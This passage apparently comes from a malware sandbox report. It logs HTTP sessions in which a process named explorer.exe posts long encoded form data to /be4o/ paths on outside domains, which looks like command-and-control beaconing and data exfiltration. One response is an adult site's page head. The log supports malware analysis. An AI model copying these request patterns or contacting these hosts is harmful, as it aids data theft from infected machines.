162KJmgAQ8JHBUeoEj_ZHIDQQdyHvZikyCDqq~qffSYROM-57FWxVrjwbiZEMscZwvqz2q1A3x3kvpZGlnyafxpmq0427ElERKybeBaYSwqZjDGemXWM2WGs89ifg4fl_MlocXNd65IPddowPwxNa8TAh75InWzOUgsrmg0TLYG8Gdodm00J6~R1GWepOQbgWfsDNuwbAS7dfM2Z6yEn0LpCD4mCgM6wGqRIIUgen4J7wz0OewFoiDyhDgIllcGxk0FRc(VPO8ntoqT68FeTuwHH6MXLE2vyYd9uRPSwTMpjoCADOfDenGO23pctloBePTDtDG_punomFeVBseWm8UtkeUuglhsPfmMcmxAJGmWfoDsdCN8IOR_6mdMpvWTvKPQ9Zou~gCdCPRltyWzglto~qw4Oe2-9BUHoVS3Iqg1ZL9rOBSwglCEu16QmYwo2quAbakjxR3P5-aGQ93mBR(fy-WdBTEt6eMKt2PRRkd8Wi9wU-LOuXy5(Nbm6MtuBhoyEt1gohJmbhJcNI1JIpnXvMPZ(ck9DSMMMMVM9TTB5DBvjuL-zr9Vt5SVXdN_ytavCaL0bvZo5AIJsnYeFKHiw4mT(7LCuGp0aF9P1t6mbz~MUvjBy
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.175916910 CET10207OUTData Raw: 4d 72 5a 72 68 6e 6d 30 66 42 4e 73 5a 70 68 69 6f 49 37 78 4f 7e 53 41 46 59 7a 65 45 73 37 39 51 64 4e 70 50 72 52 66 6c 33 49 65 6e 7e 48 45 72 77 49 4d 75 4c 6a 47 47 79 6a 28 72 56 4c 54 61 74 33 78 50 44 48 41 6b 5a 42 71 57 28 64 32 4d 6a
                                                                                                                                                                                                                              Data Ascii: MrZrhnm0fBNsZphioI7xO~SAFYzeEs79QdNpPrRfl3Ien~HErwIMuLjGGyj(rVLTat3xPDHAkZBqW(d2Mj2yvY5RjFS7RHKti8mgCF3S_ZTbCB22EYzClJEbiXPBvmErRRSL26Kn1OQ10~kTAn3YqwEXWecpgbzAMCP7XLCu54gnlrYJ58jIilHAosKn2cIlSsW(21C2Ytugfwt7QBA1CsdyG7zOHWjQ8mrYD9o67uXOqQghV(N
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366103888 CET10209OUTData Raw: 33 7e 65 65 4b 50 64 52 2d 66 59 4a 62 32 74 55 43 32 66 50 69 54 6b 6a 37 28 4f 71 48 47 63 68 6c 63 52 52 31 61 59 44 62 69 36 5a 75 74 77 55 30 75 68 4c 64 75 43 67 56 6f 41 70 71 4f 45 51 2d 37 36 5a 44 78 6d 41 4a 45 56 6b 36 4a 72 72 2d 79
                                                                                                                                                                                                                              Data Ascii: 3~eeKPdR-fYJb2tUC2fPiTkj7(OqHGchlcRR1aYDbi6ZutwU0uhLduCgVoApqOEQ-76ZDxmAJEVk6Jrr-yxyT0-Rm32nBzIaA2U9GxFZsy4HVPjeN1YMT(8QCF3(qEGw5LxVowU11K5WJuCwn6vjgRKMO7OplAJEGi3Xuq0t9jj(dcjC_Wg1v(SRQ48iZNcTNlO1Uu2~gC7nEmZBA31JjKsGl2SgtZ8hH0o96uMY4Gwph8ojLcE
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366158009 CET10215OUTData Raw: 52 4e 6d 46 56 36 58 4c 76 42 35 6a 6d 64 77 41 7a 36 4f 57 52 57 73 36 72 71 75 4f 4a 4f 38 30 58 43 4b 63 4f 76 5f 6d 37 39 34 4c 48 39 73 62 71 68 78 62 47 6d 59 62 61 63 59 39 55 53 31 68 41 37 62 55 57 53 65 7a 46 46 38 39 77 6b 51 53 4b 61
                                                                                                                                                                                                                              Data Ascii: RNmFV6XLvB5jmdwAz6OWRWs6rquOJO80XCKcOv_m794LH9sbqhxbGmYbacY9US1hA7bUWSezFF89wkQSKan~2vPGrkMdGFGt_Kwvp~Q29aFszqu1JO50sWaMUPnlZqGU7~iTRRd72avMoq9EzueRQ~As3XIFjN5XSwRX3C6ttor0ZJ3H45Iu2uLoFUPZDNqZ9aVIKu4CyQKH-7aw3cteWzwskVcwOHBLUnbWY3gfgghXtb2fVUx
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366213083 CET10221OUTData Raw: 63 46 6b 4f 45 7a 36 6e 34 34 78 34 43 77 30 56 58 38 69 6a 58 59 78 37 32 58 72 37 6b 37 57 6e 30 4f 35 64 79 50 79 67 4a 48 45 51 38 77 2d 49 42 43 6e 73 35 75 36 4f 74 62 75 4e 50 44 6b 30 34 63 31 62 4c 69 61 6f 38 76 56 75 52 78 4d 53 71 4c
                                                                                                                                                                                                                              Data Ascii: cFkOEz6n44x4Cw0VX8ijXYx72Xr7k7Wn0O5dyPygJHEQ8w-IBCns5u6OtbuNPDk04c1bLiao8vVuRxMSqLToaRpsusqijHPJyK49QeBLH9BNYy-QJpkPtxVtEQK9ZheztXxwlMEk2pMwpG0OMAOJcp9ya~ZKSC3htWwzPTPGMUr(lNUuivklU0KwTsr6V6LRDOPAQzr9-y4NGt2pZjufeu5kPcABCTTPR(vqPbrKn~fvwSSdll3
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366391897 CET10226OUTData Raw: 39 6e 33 35 33 52 35 4b 6e 4d 30 4f 43 69 62 53 30 54 6d 71 68 30 4f 44 67 58 4d 61 54 6e 50 37 78 4b 53 6e 6f 57 52 4c 30 57 58 31 35 6a 49 4a 53 28 56 37 54 35 31 47 31 31 31 53 42 35 48 33 67 53 36 78 51 47 37 51 55 71 76 75 79 64 63 54 5a 64
                                                                                                                                                                                                                              Data Ascii: 9n353R5KnM0OCibS0Tmqh0ODgXMaTnP7xKSnoWRL0WX15jIJS(V7T51G111SB5H3gS6xQG7QUqvuydcTZdCaYRe8NeRBbvMTNbpK-vGP-5s3NCYo72yDTQQiRJ2pRxzDQt8bbdjqQn5z8STasGVVDk5wYg7JaQbMqADP35NECpjmrDhO9zFkpiqHo5g~HaPquoBoyr7N92Kw8fLNHoPHmlZJT(nQYJugTWYBXZBacgK7DRcy8ow
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366647959 CET10228OUTData Raw: 55 79 57 28 56 4a 71 75 4b 49 59 78 79 71 6d 52 42 5a 76 51 65 4a 6a 61 6a 32 59 35 5a 53 33 4a 79 5a 4d 77 41 62 4e 77 6c 4d 31 5a 63 38 79 79 54 73 46 78 51 39 44 53 4b 4e 35 35 46 47 78 6a 6a 51 33 6f 4f 33 78 68 38 61 73 70 39 6b 66 44 63 62
                                                                                                                                                                                                                              Data Ascii: UyW(VJquKIYxyqmRBZvQeJjaj2Y5ZS3JyZMwAbNwlM1Zc8yyTsFxQ9DSKN55FGxjjQ3oO3xh8asp9kfDcb-p_jSyWtr4GmgxVSbN6bTn0N7mxk5N7WcoB~KuuiJ5-s79d34pSHbjPc03grFcawq5lao3e2fgC6dyq3ZXx~KASjtSCrwXP2rogHO6UIUVJgU(SIXEUP6JVNenrJTv5rEvSj69Por8mUnT-w0Gti59aOl6gJdalxY
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.366827965 CET10229OUTData Raw: 6e 68 37 36 4f 28 59 67 39 52 52 36 31 49 5a 4b 78 71 76 51 75 35 4e 39 50 54 62 72 6f 4d 5a 7e 58 77 2d 49 6b 73 78 78 4e 45 56 79 75 6b 53 31 54 66 4e 73 36 6f 6a 75 69 69 4b 6b 66 28 33 46 54 66 68 31 37 55 43 4f 39 43 44 34 6c 6f 6d 6a 72 6f
                                                                                                                                                                                                                              Data Ascii: nh76O(Yg9RR61IZKxqvQu5N9PTbroMZ~Xw-IksxxNEVyukS1TfNs6ojuiiKkf(3FTfh17UCO9CD4lomjro9PdeFa2GTS_Ns4_gog_b0F-lYXpdJRZrq(m2slEXQVDeF3rTn0FbwLx(cTcfidhrOJrWkFTjVdvfuufKzCkgbJ6UQ6KPIZ3h94v2wwhjqFtc2v2EcZhcaecuAdmxC5s8ESguGelpwyECcO1WMf5l0KTR98xv1PL(r
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.556849003 CET10235OUTData Raw: 55 61 54 32 38 6b 55 4a 47 34 6e 74 52 70 63 6e 42 44 72 34 59 4c 67 6d 61 45 34 78 65 4c 51 6b 4c 65 30 66 46 6c 30 58 45 4e 74 49 45 64 2d 31 37 7a 30 55 5f 75 71 6e 30 41 72 42 5a 64 78 7e 51 49 55 4e 4b 76 6c 64 76 71 37 37 75 73 7a 37 45 51
                                                                                                                                                                                                                              Data Ascii: UaT28kUJG4ntRpcnBDr4YLgmaE4xeLQkLe0fFl0XENtIEd-17z0U_uqn0ArBZdx~QIUNKvldvq77usz7EQjuTg3JzV3n3oy7_K1BKCw29JcO9VYddgLAUgwwkZOtpPlVOgSIsCt2gTDioX7mZNfWZw8pQNdvP5o0D2FDyX_qvUIgIE3m8YHE7wM0mr8bLsLePFgDcIq(bySS1KwGtmqvxdfcWDSYSa-Z2zO9x422PEZaZHZzlS4
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.556936979 CET10246OUTData Raw: 53 50 33 56 36 68 75 4f 52 4e 57 38 36 50 39 28 41 36 72 73 41 47 45 72 71 54 6b 51 71 76 7a 6a 43 47 35 37 34 66 77 4e 41 6d 31 35 58 70 6d 36 41 6a 74 57 63 74 57 57 7a 44 76 77 35 42 7a 4e 4a 65 32 63 55 71 69 34 58 54 4b 65 4c 39 4a 54 77 50
                                                                                                                                                                                                                              Data Ascii: SP3V6huORNW86P9(A6rsAGErqTkQqvzjCG574fwNAm15Xpm6AjtWctWWzDvw5BzNJe2cUqi4XTKeL9JTwPcOpWEnzXOUDHV4TVg6Nz5kjua1j3s6ZBKth5dJ8KXqtGKTRXXHr3QNG7tQedo~ozvhoLFql8dsroO4LGrkEkBrGg3Yp6zVCizuOBOoDqIj1dZS_zDvo16G_dSalF5BUNJHF7Oj6N6TGaQjlkBV01vf2ulD0lLtatr
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.557013035 CET10255OUTData Raw: 57 7e 34 41 65 49 30 36 5a 33 65 48 50 37 4c 36 45 36 63 45 43 68 35 79 34 64 67 71 72 42 62 4b 39 48 36 48 4a 4a 53 47 52 30 47 4d 4c 55 6b 73 5f 4c 70 4b 52 32 76 74 37 28 4d 53 4a 5a 49 33 55 62 59 4b 68 46 2d 4a 79 59 7a 72 42 72 6f 53 7a 7e
                                                                                                                                                                                                                              Data Ascii: W~4AeI06Z3eHP7L6E6cECh5y4dgqrBbK9H6HJJSGR0GMLUks_LpKR2vt7(MSJZI3UbYKhF-JyYzrBroSz~IGV5Sx_iZqqTiCHNKLalyDokzoaOGr8xk9rncyvhTydOQ2E84ErsKbHUTyd4uJ0bLrzzfQdd7hn4ye0RoElGYoTmHXF~Zwe~ChRAbQfH5Ni(jvn5uKlAHYzo5uQCSzTePHQPpbi3OExtxxp4eETEVNjlwMf2jB66M
                                                                                                                                                                                                                              Feb 21, 2022 16:56:14.125657082 CET11560INHTTP/1.1 504 Gateway Time-out
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:14 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 176
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body bgcolor="white"><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              37192.168.11.2049834154.214.67.11580C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.352895975 CET10208OUTGET /be4o/?h48Hl=kw7dGhb5eKkyCVvAuZmYTQsgnBkQwasXlJHrp3Yi63/vNGhbWFnPnmRrKjdxIJy9M/yz&7nx8=7nN0Wh-H7 HTTP/1.1
                                                                                                                                                                                                                              Host: www.nagradi7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.532075882 CET10231INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:13 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 1558
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 cb e7 bb af d3 d5 d2 bc c6 fb b3 b5 d3 c3 c6 b7 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 34 34 33 33 3b 26 23 33 38 38 39 39 3b 26 23 32 30 38 30 38 3b 26 23 33 38 31 35 35 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 33 30 34 37 35 3b 26 23 32 39 32 35 35 3b 26 23 33 36 31 36 34 3b 26 23 32 38 33 30 34 3b 2c 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 33 32 35 39 33 3b 26 23 32 32 33 33 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 33 31 38 38 31 3b 26 23 32 33 32 37 33 3b 26 23 33 34 33 38 32 3b 26 23 33 30 33 33 33 3b 26 23 32 32 38 39 39 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 38 30 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 34 34 33 33 3b 26 23 33 38 38 39 39 3b 26 23 32 30 38 30 38 3b 26 23 33 38 31 35 35 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 33 30 34 37 35 3b 26 23 32 39 32 35 35 3b 26 23 33 36 31 36 34 3b 26 23 32 38 33 30 34 3b 2c 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 33 32 35 39 33 3b 26 23 32 32 33 33 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 33 31 38 38 31 3b 26 23 32 33 32 37 33 3b 26 23 33 34 33 38 32 3b 26 23 33 30 33 33 33 3b 26 23 32 32 38 39 39 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 38 30 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 34 34 33 33 3b 26 23 33 38 38 39 39 3b 26 23 32 30 38 30 38 3b 26 23 33 38 31 35 35 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 33 30 34 37 35 3b 26 23 32 39 32 35 35 3b 26 23 33 36 31 36 34 3b 26 23 32 38 33 30 34 3b 2c 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 33 32 35 39 33 3b 26 23 32 32 33 33 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 33 31 38 38 31 3b 26 23 32 33 32 37 33 3b 26 23 33 34 33 38 32 3b 26 23 33 30 33 33 33 3b 26 23 32 32 38 39 39 3b 26 23 34 39 3b 26 23 35 36 3b 26 23 38 30 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 2c 26 23 32 32 38 32 33 3b 26 23 32 33 36 31 30 3b 26 23 32 34 32 33 30 3b 26 23 32 38 36 30 38 3b 26 23 32 38 38 37 32 3b 26 23 32 34 32 30 32 3b 26 23 32 31 35 36 33 3b 26 23 32 35 31 30 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 35
                                                                                                                                                                                                                              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#24433;&#38899;&#20808;&#38155;&#50;&#48;&#49;&#56;&#26368;&#26032;&#30475;&#29255;&#36164;&#28304;,&#23588;&#29289;&#32593;&#22336;&#22312;&#32447;&#35266;&#30475;,&#31881;&#23273;&#34382;&#30333;&#22899;&#49;&#56;&#80;,&#20013;&#22269;&#20154;&#22312;&#32447;&#35270;&#39057;&#25773;&#25918;</title><meta name="keywords" content="&#24433;&#38899;&#20808;&#38155;&#50;&#48;&#49;&#56;&#26368;&#26032;&#30475;&#29255;&#36164;&#28304;,&#23588;&#29289;&#32593;&#22336;&#22312;&#32447;&#35266;&#30475;,&#31881;&#23273;&#34382;&#30333;&#22899;&#49;&#56;&#80;,&#20013;&#22269;&#20154;&#22312;&#32447;&#35270;&#39057;&#25773;&#25918;" /><meta name="description" content="&#24433;&#38899;&#20808;&#38155;&#50;&#48;&#49;&#56;&#26368;&#26032;&#30475;&#29255;&#36164;&#28304;,&#23588;&#29289;&#32593;&#22336;&#22312;&#32447;&#35266;&#30475;,&#31881;&#23273;&#34382;&#30333;&#22899;&#49;&#56;&#80;,&#20013;&#22269;&#20154;&#22312;&#32447;&#35270;&#39057;&#25773;&#25918;,&#22823;&#23610;&#24230;&#28608;&#28872;&#24202;&#21563;&#25103;&#35270;&#39057;,&#20013;&#25
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.532104969 CET10231INData Raw: 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 2c 26 23 32 32 33 32 30 3b 26 23 33 38 30
                                                                                                                                                                                                                              Data Ascii: 991;&#23383;&#24149;&#35270;&#39057;&#20108;&#21306;&#20154;&#22971;,&#22320;&#38081;&#37324;&#30340;&#35825;&#24785;" /><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="tex


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              38192.168.11.204983595.179.246.12580C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553345919 CET10380OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.waktuk.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.waktuk.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.waktuk.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 57 43 32 56 6a 75 53 68 30 70 69 73 74 4e 63 4d 7a 54 52 31 68 77 28 45 28 78 78 73 38 6a 79 58 62 49 5a 6d 6e 79 68 78 66 6b 65 73 45 45 6a 51 55 43 79 31 69 51 61 54 56 56 46 61 65 39 76 54 76 4f 76 51 33 45 54 32 78 6a 61 6f 66 64 4a 43 4b 75 4b 73 65 70 4b 4a 65 51 48 56 38 54 75 68 7a 51 65 65 54 35 6c 49 6f 33 72 73 45 67 6a 4a 58 59 4b 30 32 6a 55 6c 56 33 62 36 64 6d 7a 48 4f 73 56 4d 76 6f 41 79 61 4f 54 43 30 49 6c 30 50 67 64 64 7a 65 75 66 36 73 59 45 56 66 55 43 43 63 6b 4d 51 6e 53 52 59 30 65 64 6c 33 69 38 48 30 6d 36 45 75 48 63 73 50 4b 75 51 75 47 54 50 32 44 44 62 34 6c 35 68 64 57 66 6e 52 37 68 45 78 7e 61 62 62 54 5f 4b 73 69 64 69 36 58 6b 74 6f 63 62 4f 46 69 53 34 37 36 42 59 64 44 68 45 4c 33 7a 34 49 58 50 34 53 71 57 65 71 28 75 66 68 57 62 79 48 42 4a 54 6a 69 44 70 2d 6c 37 6b 59 75 76 41 62 34 43 55 77 75 6e 49 69 34 75 6c 47 78 5f 6d 33 47 6b 41 33 5a 57 45 4b 31 58 77 43 44 57 4a 41 6e 6f 28 4b 4e 6e 55 41 4f 6b 65 75 76 79 34 79 28 61 7e 5f 67 68 70 64 39 4b 7e 78 43 6c 4e 74 74 61 30 61 56 71 54 34 34 45 41 75 46 72 52 62 4b 51 38 78 53 78 67 6c 33 4f 49 75 70 4f 53 4e 63 70 4a 4c 77 7a 7e 69 4b 6e 4e 46 35 2d 28 41 30 63 33 71 79 69 79 79 7a 5a 34 65 56 6a 51 4a 6e 30 70 7a 58 7a 6b 75 39 75 5a 6d 63 31 56 61 34 65 73 56 78 45 6e 39 34 34 6a 2d 6a 57 51 35 31 6f 53 75 73 79 67 4f 4d 6e 6b 35 69 57 4d 5a 75 34 53 51 47 52 50 55 4e 32 50 72 56 68 55 57 4b 73 75 7a 6f 51 45 41 6d 74 4a 71 58 58 6e 34 68 42 70 4d 74 54 4d 6a 73 67 33 43 4a 45 67 44 6c 57 62 39 31 7a 72 76 69 56 5a 48 28 45 30 46 56 43 38 7a 65 71 7e 4d 6a 30 7a 51 6d 33 53 54 4c 30 43 51 32 7a 6b 43 45 4d 42 56 38 49 33 74 36 39 58 67 4d 6f 54 76 66 6d 56 65 47 30 4a 78 41 62 62 45 62 68 59 39 61 64 48 55 68 41 54 67 4c 5f 6f 37 59 73 58 37 64 5a 45 56 61 51 6a 68 59 4f 45 46 6f 51 62 79 65 48 46 52 4a 56 7e 56 28 4a 33 41 37 7a 74 73 6c 64 31 66 66 39 59 68 50 42 5a 31 42 74 30 75 6e 39 33 31 56 7a 61 56 76 65 34 4b 79 64 4f 55 57 49 35 6b 36 69 61 68 72 49 4b 5f 37 38 4a 5f 48 44 35 75 4b 64 65 34 28 48 51 34 44 73 67 44 54 69 58 45 61 65 6a 79 35 6f 41 41 7a 66 42 47 34 65 45 35 62 41 42 65 4b 4b 33 37 47 74 6c 33 79 52 55 76 67 6d 4f 56 36 4d 72 2d 7e 77 43 72 72 30 58 38 64 47 6b 56 28 53 64 54 59 75 77 6d 6e 38 67 45 44 6e 61 37 70 77 43 70 78 50 73 4e 4d 71 4b 34 33 72 47 6f 61 55 52 30 43 6d 32 4b 79 63 4c 51 28 68 33 56 4d 64 6b 4a 55 4c 58 76 7a 61 49 41 6e 77 54 4e 64 65 69 31 4c 4f 6e 39 32 59 6d 53 4b 31 35 41 75 2d 4f 67 61 47 4b 72 32 6b 35 7a 73 63 48 46 4e 77 76 61 6c 5a 4b 51 50 79 69 58 41 5a 76 76 6a 62 37 57 4c 7a 4d 65 71 54 36 44 53 6d 58 59 51 58 66 63 28 66 48 73 67 67 32 68 38 79 71 46 56 32 4b 72 76 55 68 52 30 74 31 6b 65 68 30 42 51 4e 30 43 6d 56 53 7a 4e 39 76 35 71 32 61 55 55 57 35 37 6c 52 54 6d 28 43 4d 32 64 54 4f 33 54 7a 6b 5f 64 49 73 66 50
                                                                                                                                                                                                                              Data Ascii: h48Hl=WC2VjuSh0pistNcMzTR1hw(E(xxs8jyXbIZmnyhxfkesEEjQUCy1iQaTVVFae9vTvOvQ3ET2xjaofdJCKuKsepKJeQHV8TuhzQeeT5lIo3rsEgjJXYK02jUlV3b6dmzHOsVMvoAyaOTC0Il0Pgddzeuf6sYEVfUCCckMQnSRY0edl3i8H0m6EuHcsPKuQuGTP2DDb4l5hdWfnR7hEx~abbT_Ksidi6XktocbOFiS476BYdDhEL3z4IXP4SqWeq(ufhWbyHBJTjiDp-l7kYuvAb4CUwunIi4ulGx_m3GkA3ZWEK1XwCDWJAno(KNnUAOkeuvy4y(a~_ghpd9K~xClNtta0aVqT44EAuFrRbKQ8xSxgl3OIupOSNcpJLwz~iKnNF5-(A0c3qyiyyzZ4eVjQJn0pzXzku9uZmc1Va4esVxEn944j-jWQ51oSusygOMnk5iWMZu4SQGRPUN2PrVhUWKsuzoQEAmtJqXXn4hBpMtTMjsg3CJEgDlWb91zrviVZH(E0FVC8zeq~Mj0zQm3STL0CQ2zkCEMBV8I3t69XgMoTvfmVeG0JxAbbEbhY9adHUhATgL_o7YsX7dZEVaQjhYOEFoQbyeHFRJV~V(J3A7ztsld1ff9YhPBZ1Bt0un931VzaVve4KydOUWI5k6iahrIK_78J_HD5uKde4(HQ4DsgDTiXEaejy5oAAzfBG4eE5bABeKK37Gtl3yRUvgmOV6Mr-~wCrr0X8dGkV(SdTYuwmn8gEDna7pwCpxPsNMqK43rGoaUR0Cm2KycLQ(h3VMdkJULXvzaIAnwTNdei1LOn92YmSK15Au-OgaGKr2k5zscHFNwvalZKQPyiXAZvvjb7WLzMeqT6DSmXYQXfc(fHsgg2h8yqFV2KrvUhR0t1keh0BQN0CmVSzN9v5q2aUUW57lRTm(CM2dTO3Tzk_dIsfP
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553399086 CET10384OUTData Raw: 73 57 78 77 58 66 4c 31 36 7a 45 53 34 79 62 62 75 6b 34 35 41 70 62 61 50 71 56 6d 4c 28 4b 34 41 5a 49 32 4f 64 35 51 56 34 54 32 51 4c 6a 31 65 4c 67 34 76 7a 69 79 32 43 6a 73 36 4c 4b 7a 57 59 4b 63 7a 52 51 74 53 41 6b 61 59 52 78 74 64 38
                                                                                                                                                                                                                              Data Ascii: sWxwXfL16zES4ybbuk45ApbaPqVmL(K4AZI2Od5QV4T2QLj1eLg4vziy2Cjs6LKzWYKczRQtSAkaYRxtd8c55uPfUGtbae2f_DAC4FLp_7AYHxMbCyamWE7ESpXqwWKSWyUDumivgFaz90lz_~MLqY2KLoQF622qomWlWlI0oUuvvlzF97LPmA1jWoGS8cNpGtnMjMZN9SA7itX5BsolvvEmwsih94qhb3nX2t2zDNJGN~vehTI
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553451061 CET10390OUTData Raw: 62 76 64 6e 34 32 4e 6a 70 51 47 4e 44 4f 34 7a 4c 57 69 32 38 45 6c 47 34 39 54 30 66 6d 51 53 77 47 57 6e 65 34 64 55 31 28 39 52 42 6c 69 37 43 4e 75 4a 49 5a 73 6b 38 48 7a 49 54 75 6a 4f 42 48 31 59 52 58 51 50 74 39 73 7e 36 4b 51 63 61 51
                                                                                                                                                                                                                              Data Ascii: bvdn42NjpQGNDO4zLWi28ElG49T0fmQSwGWne4dU1(9RBli7CNuJIZsk8HzITujOBH1YRXQPt9s~6KQcaQRI1eRL7bLhiPupcsMNGbX7cp-7GppMwrAH6m6T9GL2Qz0aEj8z1vghjxPZLKoaTcljpQ0Btls7WsBO5gyNuTntertlvfINFebcQCd(T5Vvi1Su3FLTSgeh0FnUp(-Q4IYKZjm6ZrJq3BzerScJQ1jokloACwQ86aI
